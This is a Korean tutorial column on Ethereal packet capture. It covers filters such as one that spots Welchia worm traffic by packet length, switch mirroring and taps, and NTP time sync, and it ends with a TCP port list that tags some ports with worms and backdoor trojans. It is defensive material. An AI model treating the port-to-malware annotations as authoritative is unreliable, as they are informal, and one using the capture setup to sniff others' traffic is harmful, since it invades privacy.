<not 사용을 습관적으로>
필터를 사용할 때 종종 사용하게 될 옵션 중 하나가 바로 'not'이다. 이 옵션은 말 그대도 어떤 특정 패킷들은 너무도 당연해서 볼 필요가 없을 경우에 이들을 제외한 나머지를 보고자 할 때 사용하는 옵션이다.
다음은 icmp를 이용한 웜인 웰치아(Welchia)가 한창 유행일 때 사용했던 옵션이다. 이 패킷의 특징은 icmp를 사용하는 핑(ping)을 이용해 불특정 네트워크를 검색하느라 라우터, 파이어월과 같은 IP 처리 장비들이 제대로 서비스를 못하는 문제를 야기시켰다. 하지만 이 패킷은‘92바이트'라는 패킷 사이즈를 가지는 게 특징이었으므로 단순히 icmp를 네트워크에서 분리할 경우에는 어떤 호스트에 문제가 있는지를 찾기는 쉽지 않았다. 하지만 툴을 제대로 사용할 줄 아는 사람이라면 다음과 같은 방법을 쓰면 어렵지 않게 구분해 낼 수가 있다.
(화면 4) 필터 4. icmp and ip[2:2] = 92
(화면 4)의 옵션인 'icmp and ip[2:2] = 92'를 살펴보자. 무슨 암호문자 같기도 하지만 해석해 보면 그리 어렵지는 않다. 우선 icmp이면서 ip[2:2] = 92라고 했다. ip는 ip인데 뒤에 [2:2]라는 이상한 옵션이 추가됐다. 여기서 앞에 숫자 2는 바이트 단위로, IP 헤더 중에 2바이트인 16비트 뒷부분을 가리킨다. 그리고 뒤에 숫자 2는 거기부터 다시 16비트이다. 바로 그 값이 92인 것을 가리킨다. 물론 한번에 이해하기가 쉽지는 않을 것이다. 사실 필자도 처음 이 옵션을 찾아냈을 때 한참을 해매야만 했다.
(그림 2)는 IP 헤더의 구조다. 이제 앞에서 설명한 2:2의 비밀을 파헤쳐 보자. (그림 2)에서는 32비트 단위로 구분을 했고 그중에 헤더의 16비트, 즉 2바이트 뒤가 바로 패킷의 길이를 나타내는 부분이다. 그리고 길이를 나타내는 필드는 전체 16비트, 즉 2바이트 안에 표기하게 돼 있다. 그 길이가 92인 값을 찾아달라는 것이다. 이제 이해가 좀 될 것이다. 아직도 이해가 안된다면 지난 3월호에 연재했던 IP 헤더에 대해 다시 한번 공부하자.
실시간으로 패킷을 볼 때면 리스트가 너무 빨리 지나가기 때문에 사실 이더리얼에 능숙한 사람이라도 보고 싶은 부분만을 잡아내기란 쉽지 않다. 그래서 이더리얼은 실시간 패킷을 볼 때 바로바로 필터를 적용할 수 있는 방법을 제공한다. 이 필터의 장점은 캡처 필터에서 사용된 옵션대로 필터는 하고 있지만, 화면에 보이는 부분만 다시 필터를 사용할 수가 있다는 것이다. 그렇기 때문에 다시 화면 필터를 제거하면 캡처 필터에서 사용했던 필터대로 나타나게 된다. 가장 중요한 것은 실시간 작업을 할 수가 있다는 점이다. 그런데 이 필터 옵션은 캡처 옵션과는 조금 다른 형태를 갖고 있으므로 여러분들이 조금만 신경 쓰면 어렵지 않게 좋은 결과를 얻을 수가 있다.
(화면 5) ICMP/TCP 등이 혼재돼 있는 캡처
(화면 5)처럼 몇가지 필터를 사용해 캡처를 시작했는데 캡처 중에 icmp만 보고 싶다면 캡처를 정지할 필요가 없다. 그냥 화면 필터 부분에 (화면 6)과 같이 해주면 된다.
(화면 6) 실시간 캡처 중 다시 icmp만 화면 필터 적용
(화면 6)은 icmp만을 다시 보기 위해서 적용한 화면 필터로, 필요한 부분을 봤다면 삭제하거나 'Clear'라고 하면 원래의 필터대로 보이게 하는 옵션이다. 실시간으로 되는 것도 제법인데 이 옵션은 아주 마음에 드는 기능 중 하나다. 이 필터를 제대로 쓰고 싶다면 옆에 있는 Expression 메뉴를 클릭해 보자. 필자가 웰치아(Welchia)를 이더리얼로 캡처할 때 사용한 옵션이 화면 필터에서는 (화면 7)과 같이 Expression 옵션에서 사용할 수가 있다.
(화면 7) 화면 필터의 Expression
(화면 8) IP 전체 길이 92바이트 선택
(화면 8)은 Expression의 IP 부분만 선택해서 세부적인 필드 중에 길이(Length) 필드의 값이 92인 것을 선택한 화면이다. 이처럼 여러분들이 프로토콜에 대한 세부지식(헤더구조 등)만 안다면 얼마든지 많은 옵션을 사용해 정말 분석다운 분석을 할 수가 있다.
이번에는 컬러 필터라는 것을 한번 사용해 보자. 컬러 필터는 화면 필터와 같은 옵션이지만 여기에 색(Color)을 겸비해서 사용하는 방법으로 가독성을 한층 올려주는 방법이다. 메뉴의 'Color Rules'를 선택해 필터와 보여지는 색깔을 선택하면 된다. 배경색깔과 각 패킷 리스트의 글씨를 구분할 수 있다.
(화면 9) TCP 패킷들의 색깔만 필터 적용
이 기능은 단순히 화려하게 보이려는 목적보다는 패킷을 조금 더 빨리 분석하기 위한 이더리얼의 배려이니 자신만의 컬러 필터를 만들어 별도로 저장해 보자.
캡처하는 방법에 대한 고민
앞에서 필자가 거짓말을 조금 보태서 이더리얼을 이용하면 많은 것을 할 수 있고 마치 이더리얼을 사용할 줄 알면 패킷 분석의 고수가 될 것 같은 인상을 풍긴 듯 한다. 그런데 사실은 정말 그렇다.
패킷분석기를 이용해도 별로 소용이 없다라고 말하는 이들 중 대부분은 필자가 아는 한 잘못된 방법이나 위치에서 패킷 분석기를 이용해 캡처를 하는 경우다. 때문에 정작 문제가 발생했을 때 중요한 패킷을 캡처하지 못한 경우가 많다. 사실 이번 출장에서 필자가 문제를 해결할 때도 그런 면이 없지 않았다. 하지만 너무 많은 구간에서의 문제 발생 가능성이 있을 때는 어쩔 수 없기도 하다. 생각해 보라. 패킷 분석을 위해 수십 대의 분석 툴을 설치한다는 것이 쉬운 일인가. 더군다나 캡처는 캡처지만 이후에 이 패킷을 모두 분석해야 하는데, 캡처한 데이터가 수백 기가바이트가 넘어간 시점에서는 정말 암담할 뿐이다. 하지만 조금만 신경쓰면 이 같은 문제들은 조금씩 줄일 수는 있다.
이더리얼을 어디에 연결할까
문제가 생긴 네트워크에 그냥 이더리얼이 설치된 컴퓨터를 연결한다고 해서 모든 패킷이 캡처되는 것은 분명 아니다. 그렇기 때문에 어떻게 연결해야 할까를 이제는 고민해야 한다.
만약 내 컴퓨터만의 문제라면 별 문제없이 내 컴퓨터에서 구동만 하면 되지만 네트워크의 다른 호스트의 문제나 다른 패킷을 분석하려면 모든 패킷이 지나다니는 구간을 선택해야 한다. 가장 좋은 방법이 스위치에서 업링크 포트를 미러링하는 방법이다. 이 방법을 사용할 경우, 스위치에서 간단한 미러링 설정만 하면 된다.
가끔 어떤 작업자는 미러링 설정을 할 때 특정 패킷(In or Out)만 선택하는 경우가 있는데, 이런 부분을 선택할 때도 신중하게 내가 얻고자 하는 데이터와 관련이 있는가를 고민해야 한다. 특별한 문제가 없다면 In/Out을 모두 선택하는 방법을 추천한다. 참고로 일부 스위치들은 미러링을 받는 포트에 연결된 컴퓨터가 다른 포트와의 통신이 안되는 경우가 있다. 이 경우 패킷 분석기가 설치된 컴퓨터를 원격에서 제어하는 방법도 고민해야 한다. 그래서 가끔 LAN 카드를 하나 더 연결하는 경우도 있다.
그리고 필요에 따라서는 외부와 연결되는 한 포트만 미러링을 해도 되지만 N:1처럼 여러 포트를 미러링해야 할 필요가 있을 수도 있다. 가급적이면 유연한 생각을 갖고 운영할 수 있도록 한다.
가끔씩 미러링이 현실적으로 불가능할 경우에는 탭(Tap)이라는 장비를 사용하는 경우가 있다. 이 장비를 연결되는 두 장비 중간에 연결해 필요한 패킷들을 패킷 분석 툴이 설치된 컴퓨터로 보내줄 수가 있다. 이런 장비들은 요즘 한창 사용되고 있으므로 알아둘 필요가 있다.
탭이나 미러링 장비를 연결할 때 가끔 연결에만 신경을 쓰다가 포트 설정(Speed/Duplex)을 무시하는 경우가 있는데, 이 부분도 신경을 쓰도록 하자. 포트 설정이 잘못될 경우 패킷 분석기와의 통신에서 패킷이 손실될 수가 있기 때문이다. 이 같은 사소한 문제로 거사를 놓칠 수는 없지 않겠는가?
스위치에서 미러링을 하는 이유는 스위치는 허브와 달리 입력되는 패킷이 모든 포트로 전달되지 않기 때문이다(사실 이것이 바로 스위치의 장점이다). 그래서 모든 패킷을 받지 못하기 때문에 미러링을 사용하는 것이다. 그래서 가끔 역으로 입력되는 모든 패킷을 모든 포트로 전달하는 허브를 이용하기도 하는데 개인적으로는 이 방법은 권장하지 않는다. 대량의 트래픽 처리시 아무래도 허브의 성능 부족이나 충돌(Collision) 등으로 인해 분석에 혼란을 야기 할 수도 있기 때문이다.
컴퓨터의 시간을 맞추자
이더리얼을 사용할 때 정말로 신경써야 할 게 한가지가 더 남아 있다. 그것은 바로 컴퓨터의 시간을 맞추는 일이다. 지난호의 시스로그 서버도 그렇지만, 이들이 남기는 시간은 모두 컴퓨터에 맞춰진 시간을 기준으로 한다.
문제가 다시 발생했을 때 분석시 정말 사소한 시간 문제로 고민하지 않으려면 컴퓨터의 시간을 주변의 장비들과 동일하게 맞춰야 한다. 가장 좋은 방법은 NTP(Network Time Protocol)를 사용하는 방법인데, 대부분 관리가 가능한 장비들은 NTP를 지원하므로 윈도우용 NTP 클라이언트를 인터넷에서 찾아 시간을 동기화하자.
혹시라도 이런 작업이 귀찮아서 나중에 분석할 때 시간차를 계산해서 하겠다는 생각은 아예 버려라. 잠깐의 귀찮음이 여러분들의 시간과 실력을 한참 퇴보하게 만들것이다. 패킷분석은 때로는 초 단위 보다 더 세분화해서 하는 경우가 있으니 부디 필자의 조언을 듣기 바란다.
이더리얼은 공개용이지만 정말 추천할 만한 툴이다. 사실 필자도 처음에는 불법(?) 스니퍼를 사용하면서 패킷 분석기를 접해봤지만 지금은 대부분의 경우 이더리얼을 사용한다. 물론 업무용도로 말이다. 매달 쓰는 원고 내용마다 중요하지 않은 것은 없지만, 이번에 소개한 패킷 분석기는 정말로 그 어느것보다도 중요하다는 점을 강조하면서 이번호를 마친다.
Network 강좌
TCP Port Number List
TCP 0 Reserved
TCP 1 Port Service Multiplexer
TCP 2 Management Utility
TCP 3 Compression Process
TCP 4 Unassigned
TCP 5 Remote Job Entry
TCP 6 Unassigned
TCP 7 Echo
TCP 8 Unassigned
TCP 9 Discard
TCP 10 Unassigned
TCP 11 Active Users
TCP 12 Unassigned
TCP 13 Daytime (RFC 867)
TCP 14 Unassigned
TCP 15 Unassigned [was netstat]
TCP 16 Unassigned
TCP 17 Quote of the Day
TCP 18 Message Send Protocol
TCP 19 Character Generator
TCP 20 File Transfer [Default Data]
TCP 21 File Transfer [Control]
TCP 22 SSH Remote Login Protocol
TCP 23 Telnet
TCP 24 any private mail system
TCP 25 Simple Mail Transfer
TCP 26 Unassigned
TCP 27 NSW User System FE
TCP 28 Unassigned
TCP 29 MSG ICP
TCP 30 Unassigned
TCP 31 MSG Authentication
TCP 32 Unassigned
TCP 33 Display Support Protocol
TCP 34 Unassigned
TCP 35 any private printer server
TCP 36 Unassigned
TCP 37 Time / W32.Sober.I virus
TCP 38 Route Access Protocol
TCP 39 Resource Location Protocol
TCP 40 Unassigned
TCP 41 Graphics
TCP 42 Host Name Server
TCP 43 WhoIs
TCP 44 MPM FLAGS Protocol
TCP 45 Message Processing Module [recv]
TCP 46 MPM [default send]
TCP 47 NI FTP
TCP 48 Digital Audit Daemon
TCP 49 Login Host Protocol (TACACS)
TCP 50 Remote Mail Checking Protocol
TCP 51 IMP Logical Address Maintenance
TCP 52 XNS Time Protocol
TCP 53 Domain Name Server
TCP 54 XNS Clearinghouse
TCP 55 ISI Graphics Language
TCP 56 XNS Authentication
TCP 57 any private terminal access
TCP 58 XNS Mail
TCP 59 any private file service
TCP 60 Unassigned
TCP 61 NI MAIL
TCP 62 ACA Services
TCP 63 whois++
TCP 64 Communications Integrator (CI)
TCP 65 TACACS-Database Service
TCP 66 Oracle SQL*NET
TCP 67 Bootstrap Protocol Server
TCP 68 Bootstrap Protocol Client
TCP 69 Trivial File Transfer
TCP 70 Gopher
TCP 71 Remote Job Service
TCP 72 Remote Job Service
TCP 73 Remote Job Service
TCP 74 Remote Job Service
TCP 75 any private dial out service
TCP 76 Distributed External Object Store
TCP 77 any private RJE service
TCP 78 vettcp
TCP 79 Finger
TCP 80 World Wide Web HTTP
TCP 81 HOSTS2 Name Server / Bagle-AZ worm / Win32.Rbot worm
TCP 82 XFER Utility
TCP 83 MIT ML Device
TCP 84 Common Trace Facility
TCP 85 MIT ML Device
TCP 86 Micro Focus Cobol
TCP 87 any private terminal link
TCP 88 Kerberos
TCP 89 SU/MIT Telnet Gateway
TCP 90 DNSIX Securit Attribute Token Map
TCP 91 MIT Dover Spooler
TCP 92 Network Printing Protocol
TCP 93 Device Control Protocol
TCP 94 Tivoli Object Dispatcher
TCP 95 SUPDUP
TCP 96 DIXIE Protocol Specification
TCP 97 Swift Remote Virtural File Protocol
TCP 98 Linuxconf / TAC News
TCP 99 Metagram Relay
TCP 100 [unauthorized use]
TCP 101 NIC Host Name Server
TCP 102 MSExchangeMTA X.400 / ISO-TSAP Class 0
TCP 103 Genesis Point-to-Point Trans Net
TCP 104 ACR-NEMA Digital Imag. & Comm. 300
TCP 105 Mailbox Name Nameserver
TCP 106 3COM-TSMUX
TCP 107 Remote Telnet Service
TCP 108 SNA Gateway Access Server
TCP 109 Post Office Protocol - Version 2
TCP 110 Post Office Protocol - Version 3
TCP 111 SUN Remote Procedure Call
TCP 112 McIDAS Data Transmission Protocol
TCP 113 Authentication Service
TCP 114 Audio News Multicast
TCP 115 Simple File Transfer Protocol
TCP 116 ANSA REX Notify
TCP 117 UUCP Path Service
TCP 118 SQL Services
TCP 119 Network News Transfer Protocol
TCP 120 CFDPTKT
TCP 121 Encore Expedited Remote Pro.Call
TCP 122 SMAKYNET
TCP 123 Network Time Protocol
TCP 124 ANSA REX Trader
TCP 125 Locus PC-Interface Net Map Ser
TCP 126 Unisys Unitary Login
TCP 127 Locus PC-Interface Conn Server
TCP 128 GSS X License Verification
TCP 129 Password Generator Protocol
TCP 130 cisco FNATIVE
TCP 131 cisco TNATIVE
TCP 132 cisco SYSMAINT
TCP 133 Statistics Service
TCP 134 INGRES-NET Service
TCP 135 DCE endpoint resolution
TCP 136 PROFILE Naming System
TCP 137 NETBIOS Name Service
TCP 138 NETBIOS Datagram Service
TCP 139 NETBIOS Session Service
TCP 140 EMFIS Data Service
TCP 141 EMFIS Control Service
TCP 142 Britton-Lee IDM
TCP 143 Internet Message Access Protocol
TCP 144 Universal Management Architecture
TCP 145 UAAC Protocol
TCP 146 ISO-IP0
TCP 147 ISO-IP
TCP 148 Jargon
TCP 149 AED 512 Emulation Service
TCP 150 SQL-NET
TCP 151 HEMS
TCP 152 Background File Transfer Program
TCP 153 SGMP
TCP 154 NETSC
TCP 155 NETSC
TCP 156 SQL Service
TCP 157 KNET/VM Command/Message Protocol
TCP 158 PCMail Server
TCP 159 NSS-Routing
TCP 160 SGMP-TRAPS
TCP 161 SNMP
TCP 162 SNMPTRAP
TCP 163 CMIP/TCP Manager
TCP 164 CMIP/TCP Agent
TCP 165 Xerox
TCP 166 Sirius Systems
TCP 167 NAMP
TCP 168 RSVD
TCP 169 SEND
TCP 170 Network PostScript
TCP 171 Network Innovations Multiplex
TCP 172 Network Innovations CL/1
TCP 173 Xyplex
TCP 174 MAILQ
TCP 175 VMNET
TCP 176 GENRAD-MUX
TCP 177 X Display Manager Control Protocol
TCP 178 NextStep Window Server
TCP 179 Border Gateway Protocol
TCP 180 Intergraph
TCP 181 Unify
TCP 182 Unisys Audit SITP
TCP 183 OCBinder
TCP 184 OCServer
TCP 185 Remote-KIS
TCP 186 KIS Protocol
TCP 187 Application Communication Interface
TCP 188 Plus Five's MUMPS
TCP 189 Queued File Transport
TCP 190 Gateway Access Control Protocol
TCP 191 Prospero Directory Service
TCP 192 OSU Network Monitoring System
TCP 193 Spider Remote Monitoring Protocol
TCP 194 Internet Relay Chat Protocol
TCP 195 DNSIX Network Level Module Audit
TCP 196 DNSIX Session Mgt Module Audit Redir
TCP 197 Directory Location Service
TCP 198 Directory Location Service Monitor
TCP 199 SMUX
TCP 200 IBM System Resource Controller
TCP 201 AppleTalk Routing Maintenance
TCP 202 AppleTalk Name Binding
TCP 203 AppleTalk Unused
TCP 204 AppleTalk Echo
TCP 205 AppleTalk Unused
TCP 206 AppleTalk Zone Information
TCP 207 AppleTalk Unused
TCP 208 AppleTalk Unused
TCP 209 The Quick Mail Transfer Protocol
TCP 210 ANSI Z39.50
TCP 211 Texas Instruments 914C/G Terminal
TCP 212 ATEXSSTR
TCP 213 IPX
TCP 214 VM PWSCS
TCP 215 Insignia Solutions
TCP 216 Computer Associates Int'l License Server
TCP 217 dBASE Unix
TCP 218 Netix Message Posting Protocol
TCP 219 Unisys ARPs
TCP 220 Interactive Mail Access Protocol v3
TCP 221 Berkeley rlogind with SPX auth
TCP 222 Berkeley rshd with SPX auth
TCP 223 Certificate Distribution Center
TCP 224 masqdialer
TCP 242 Direct
TCP 243 Survey Measurement
TCP 244 inbusiness
TCP 245 LINK
TCP 246 Display Systems Protocol
TCP 247 SUBNTBCST_TFTP
TCP 248 bhfhs
TCP 256 RAP/Checkpoint SNMP
TCP 257 Check Point / Secure Electronic Transaction
TCP 258 Check Point / Yak Winsock Personal Chat
TCP 259 Check Point Firewall-1 telnet auth / Efficient Short Remote Operations
TCP 260 Openport
TCP 261 IIOP Name Service over TLS/SSL
TCP 262 Arcisdms
TCP 263 HDAP
TCP 264 BGMP / Check Point
TCP 265 X-Bone CTL
TCP 266 SCSI on ST
TCP 267 Tobit David Service Layer
TCP 268 Tobit David Replica
TCP 280 HTTP-mgmt
TCP 281 Personal Link
TCP 282 Cable Port A/X
TCP 283 rescap
TCP 284 corerjd
TCP 286 FXP-1
TCP 287 K-BLOCK
TCP 308 Novastor Backup
TCP 309 EntrustTime
TCP 310 bhmds
TCP 311 AppleShare IP WebAdmin
TCP 312 VSLMP
TCP 313 Magenta Logic
TCP 314 Opalis Robot
TCP 315 DPSI
TCP 316 decAuth
TCP 317 Zannet
TCP 318 PKIX TimeStamp
TCP 319 PTP Event
TCP 320 PTP General
TCP 321 PIP
TCP 322 RTSPS
TCP 333 Texar Security Port
TCP 344 Prospero Data Access Protocol
TCP 345 Perf Analysis Workbench
TCP 346 Zebra server
TCP 347 Fatmen Server
TCP 348 Cabletron Management Protocol
TCP 349 mftp
TCP 350 MATIP Type A
TCP 351 bhoetty (added 5/21/97)
TCP 352 bhoedap4 (added 5/21/97)
TCP 353 NDSAUTH
TCP 354 bh611
TCP 355 DATEX-ASN
TCP 356 Cloanto Net 1
TCP 357 bhevent
TCP 358 Shrinkwrap
TCP 359 Tenebris Network Trace Service
TCP 360 scoi2odialog
TCP 361 Semantix
TCP 362 SRS Send
TCP 363 RSVP Tunnel
TCP 364 Aurora CMGR
TCP 365 DTK
TCP 366 ODMR
TCP 367 MortgageWare
TCP 368 QbikGDP
TCP 369 rpc2portmap
TCP 370 codaauth2
TCP 371 Clearcase
TCP 372 ListProcessor
TCP 373 Legent Corporation
TCP 374 Legent Corporation
TCP 375 Hassle
TCP 376 Amiga Envoy Network Inquiry Proto
TCP 377 NEC Corporation
TCP 378 NEC Corporation
TCP 379 TIA/EIA/IS-99 modem client
TCP 380 TIA/EIA/IS-99 modem server
TCP 381 hp performance data collector
TCP 382 hp performance data managed node
TCP 383 hp performance data alarm manager
TCP 384 A Remote Network Server System
TCP 385 IBM Application
TCP 386 ASA Message Router Object Def.
TCP 387 Appletalk Update-Based Routing Pro.
TCP 388 Unidata LDM
TCP 389 Lightweight Directory Access Protocol / Internet Locator Service (ILS)
TCP 390 UIS
TCP 391 SynOptics SNMP Relay Port
TCP 392 SynOptics Port Broker Port
TCP 393 Data Interpretation System
TCP 394 EMBL Nucleic Data Transfer
TCP 395 NETscout Control Protocol
TCP 396 Novell Netware over IP
TCP 397 Multi Protocol Trans. Net.
TCP 398 Kryptolan
TCP 399 ISO Transport Class 2 Non-Control over TCP
TCP 400 Workstation Solutions
TCP 401 Uninterruptible Power Supply
TCP 402 Genie Protocol
TCP 403 decap
TCP 404 nced
TCP 405 ncld
TCP 406 Interactive Mail Support Protocol
TCP 407 Timbuktu
TCP 408 Prospero Resource Manager Sys. Man.
TCP 409 Prospero Resource Manager Node Man.
TCP 410 DECLadebug Remote Debug Protocol
TCP 411 Remote MT Protocol
TCP 412 NeoModus Direct Connect (Windows file sharing program) / Trap Convention Port
TCP 413 SMSP
TCP 414 InfoSeek
TCP 415 BNet
TCP 416 Silverplatter
TCP 417 Onmux
TCP 418 Hyper-G
TCP 419 Ariel
TCP 420 SMPTE
TCP 421 Ariel
TCP 422 Ariel
TCP 423 IBM Operations Planning and Control Start
TCP 424 IBM Operations Planning and Control Track
TCP 425 ICAD
TCP 426 smartsdp
TCP 427 Server Location
TCP 428 OCS_CMU
TCP 429 OCS_AMU
TCP 430 UTMPSD
TCP 431 UTMPCD
TCP 432 IASD
TCP 433 NNSP
TCP 434 MobileIP-Agent
TCP 435 MobilIP-MN
TCP 436 DNA-CML
TCP 437 comscm
TCP 438 dsfgw
TCP 439 dasp
TCP 440 sgcp
TCP 441 decvms-sysmgt
TCP 442 cvc_hostd
TCP 443 HTTP protocol over TLS/SSL
TCP 444 Simple Network Paging Protocol
TCP 445 Microsoft-DS
TCP 446 DDM-RDB
TCP 447 DDM-RFM
TCP 448 DDM-SSL
TCP 449 AS Server Mapper
TCP 450 TServer
TCP 451 Cray Network Semaphore server
TCP 452 Cray SFS config server
TCP 453 CreativeServer
TCP 454 ContentServer
TCP 455 CreativePartnr
TCP 456 macon-tcp
TCP 457 scohelp
TCP 458 apple quick time
TCP 459 ampr-rcmd
TCP 460 skronk
TCP 461 DataRampSrv
TCP 462 DataRampSrvSec
TCP 463 alpes
TCP 464 kpasswd
TCP 465 SMTPS
TCP 466 digital-vrc
TCP 467 mylex-mapd
TCP 468 proturis
TCP 469 Radio Control Protocol
TCP 470 scx-proxy
TCP 471 Mondex
TCP 472 ljk-login
TCP 473 hybrid-pop
TCP 474 tn-tl-w1
TCP 475 tcpnethaspsrv
TCP 476 tn-tl-fd1
TCP 477 ss7ns
TCP 478 spsc
TCP 479 iafserver
TCP 480 iafdbase
TCP 481 Ph service
TCP 482 bgs-nsi
TCP 483 ulpnet
TCP 484 Integra Software Management Environment
TCP 485 Air Soft Power Burst
TCP 486 avian
TCP 487 saft Simple Asynchronous File Transfer
TCP 488 gss-HTTP
TCP 489 nest-protocol
TCP 490 micom-pfs
TCP 491 go-login
TCP 492 Transport Independent Convergence for FNA
TCP 493 Transport Independent Convergence for FNA
TCP 494 POV-Ray
TCP 495 intecourier
TCP 496 PIM-RP-DISC
TCP 497 dantz
TCP 498 siam
TCP 499 ISO ILL Protocol
TCP 500 ISAKMP
TCP 501 STMF
TCP 502 asa-appl-proto
TCP 503 Intrinsa
TCP 504 citadel
TCP 505 mailbox-lm
TCP 506 ohimsrv
TCP 507 crs
TCP 508 xvttp
TCP 509 snare
TCP 510 FirstClass Protocol
TCP 511 PassGo
TCP 512 Remote process execution
TCP 513 Remote Login
TCP 514 Remote Shell
TCP 515 spooler
TCP 516 videotex
TCP 517 like tenex link but across
TCP 518 talkd
TCP 519 unixtime
TCP 520 extended file name server
TCP 521 ripng
TCP 522 User Location Service / ULP
TCP 523 IBM-DB2
TCP 524 NCP
TCP 525 timeserver
TCP 526 newdate
TCP 527 Stock IXChange
TCP 528 Customer IXChange
TCP 529 IRC-SERV
TCP 530 rpc
TCP 531 chat
TCP 532 readnews
TCP 533 for emergency broadcasts
TCP 534 MegaMedia Admin
TCP 535 iiop
TCP 536 opalis-rdv
TCP 537 Networked Media Streaming Protocol
TCP 538 gdomap
TCP 539 Apertus Technologies Load Determination
TCP 540 uucpd
TCP 541 uucp-rlogin
TCP 542 commerce
TCP 543 kerberos (v4/v5)
TCP 544 krcmd
TCP 545 appleqtcsrvr
TCP 546 DHCPv6 Client
TCP 547 DHCPv6 Server
TCP 548 AppleShare AFP over TCP
TCP 549 IDFP
TCP 550 new-who
TCP 551 cybercash
TCP 552 deviceshare
TCP 553 pirp
TCP 554 Real Time Stream Control Protocol
TCP 555 phAse Zero backdoor (Win 9x, NT) / dsf
TCP 556 rfs server
TCP 557 openvms-sysipc
TCP 558 SDNSKMP
TCP 559 TEEDTAP / Backdoor.Domwis Win32 trojan
TCP 560 rmonitord
TCP 561 monitor
TCP 562 chcmd
TCP 563 AOL IM / NNTP protocol over TLS/SSL
TCP 564 plan 9 file service
TCP 565 whoami
TCP 566 streettalk
TCP 567 banyan-rpc
TCP 568 microsoft shuttle
TCP 569 microsoft rome
TCP 570 demon
TCP 571 udemon
TCP 572 sonar
TCP 573 banyan-vip
TCP 574 FTP Software Agent System
TCP 575 VEMMI
TCP 576 ipcd
TCP 577 vnas
TCP 578 ipdd
TCP 579 decbsrv
TCP 580 SNTP HEARTBEAT
TCP 581 Bundle Discovery Protocol
TCP 582 SCC Security
TCP 583 Philips Video-Conferencing
TCP 584 Key Server
TCP 585 IMAP4+SSL
TCP 586 Password Change
TCP 587 Message Submission (Sendmail)
TCP 588 CAL
TCP 589 EyeLink
TCP 590 TNS CML
TCP 591 FileMaker Inc. - HTTP Alternate
TCP 592 Eudora Set
TCP 593 HTTP RPC Ep Map
TCP 594 TPIP
TCP 595 CAB Protocol
TCP 596 SMSD
TCP 597 PTC Name Service
TCP 598 SCO Web Server Manager 3
TCP 599 Aeolon Core Protocol
TCP 600 Sun IPC server
TCP 606 Cray Unified Resource Manager
TCP 607 nqs
TCP 608 Sender-Initiated/Unsolicited File Transfer
TCP 609 npmp-trap
TCP 610 Apple Admin Service / npmp-local
TCP 611 npmp-gui
TCP 612 HMMP Indication
TCP 613 HMMP Operation
TCP 614 SSLshell
TCP 615 Internet Configuration Manager
TCP 616 SCO System Administration Server
TCP 617 SCO Desktop Administration Server
TCP 618 DEI-ICDA
TCP 619 Digital EVM
TCP 620 SCO WebServer Manager
TCP 621 ESCP
TCP 622 Collaborator
TCP 623 Aux Bus Shunt
TCP 624 Crypto Admin
TCP 625 DEC DLM
TCP 626 ASIA
TCP 627 PassGo Tivoli
TCP 628 QMQP
TCP 629 3Com AMP3
TCP 630 RDA
TCP 631 IPP (Internet Printing Protocol)
TCP 632 bmpp
TCP 633 Service Status update (Sterling Software)
TCP 634 ginad
TCP 635 RLZ DBase
TCP 636 LDAP protocol over TLS/SSL
TCP 637 lanserver
TCP 638 mcns-sec
TCP 639 MSDP
TCP 640 entrust-sps
TCP 641 repcmd
TCP 642 ESRO-EMSDP V1.3
TCP 643 SANity
TCP 644 dwr
TCP 645 PSSC
TCP 646 LDP
TCP 647 DHCP Failover
TCP 648 Registry Registrar Protocol (RRP)
TCP 649 Aminet
TCP 650 OBEX
TCP 651 IEEE MMS
TCP 652 UDLR_DTCP
TCP 653 RepCmd
TCP 654 AODV
TCP 655 TINC
TCP 656 SPMP
TCP 657 RMC
TCP 658 TenFold
TCP 659 URL Rendezvous
TCP 660 MacOS Server Admin
TCP 661 HAP
TCP 662 PFTP
TCP 663 PureNoise
TCP 664 Secure Aux Bus
TCP 665 Sun DR
TCP 666 doom Id Software
TCP 667 campaign contribution disclosures - SDR Technologies
TCP 668 MeComm
TCP 669 MeRegister
TCP 670 VACDSM-SWS
TCP 671 VACDSM-APP
TCP 672 VPPS-QUA
TCP 673 CIMPLEX
TCP 674 ACAP
TCP 675 DCTP
TCP 676 VPPS Via
TCP 677 Virtual Presence Protocol
TCP 678 GNU Gereration Foundation NCP
TCP 679 MRM
TCP 680 entrust-aaas
TCP 681 entrust-aams
TCP 682 XFR
TCP 683 CORBA IIOP
TCP 684 CORBA IIOP SSL
TCP 685 MDC Port Mapper
TCP 686 Hardware Control Protocol Wismar
TCP 687 asipregistry
TCP 688 REALM-RUSD
TCP 689 NMAP
TCP 690 VATP
TCP 691 MS Exchange Routing
TCP 692 Hyperwave-ISP
TCP 693 connendp
TCP 694 ha-cluster
TCP 695 IEEE-MMS-SSL
TCP 696 RUSHD
TCP 697 UUIDGEN
TCP 698 OLSR
TCP 704 errlog copy/server daemon
TCP 705 AgentX
TCP 706 SILC
TCP 707 W32.Nachi Worm / Borland DSJ
TCP 709 Entrust Key Management Service Handler
TCP 710 Entrust Administration Service Handler
TCP 711 Cisco TDP
TCP 729 IBM NetView DM/6000 Server/Client
TCP 730 IBM NetView DM/6000 send/tcp
TCP 731 IBM NetView DM/6000 receive/tcp
TCP 740 (old) NETscout Control Protocol (old)
TCP 741 netGW
TCP 742 Network based Rev. Cont. Sys.
TCP 744 Flexible License Manager
TCP 747 Fujitsu Device Control
TCP 748 Russell Info Sci Calendar Manager
TCP 749 kerberos administration
TCP 750 rfile
TCP 751 pump
TCP 752 Kerberos password server
TCP 753 Kerberos userreg server
TCP 754 send
TCP 758 nlogin
TCP 759 con
TCP 760 kreg, kerberos/4 registration
TCP 761 kpwd, Kerberos/4 password
TCP 762 quotad
TCP 763 cycleserv
TCP 764 omserv
TCP 765 webster
TCP 767 phone
TCP 769 vid
TCP 770 cadlock
TCP 771 rtip
TCP 772 cycleserv2
TCP 773 submit
TCP 774 rpasswd
TCP 775 entomb
TCP 776 wpages
TCP 777 Multiling HTTP
TCP 780 wpgs
TCP 781 HP performance data collector
TCP 782 node HP performance data managed node
TCP 783 HP performance data alarm manager
TCP 786 Concert
TCP 787 QSC
TCP 799 ControlIT / Remotely Possible
TCP 800 mdbs_daemon / Remotely Possible
TCP 801 device
TCP 808 CCProxy
TCP 810 FCP
TCP 828 itm-mcell-s
TCP 829 PKIX-3 CA/RA
TCP 871 SUP server
TCP 873 rsync
TCP 886 ICL coNETion locate server
TCP 887 ICL coNETion server info
TCP 888 CD Database Protocol
TCP 900 Check Point Firewall-1 HTTP administration / OMG Initial Refs
TCP 901 Samba Web Administration Tool / Realsecure / SMPNAMERES/ NetDevil trojan
TCP 902 VMware Authentication Daemon / IDEAFARM-CHAT
TCP 903 IDEAFARM-CATCH / NetDevil trojan
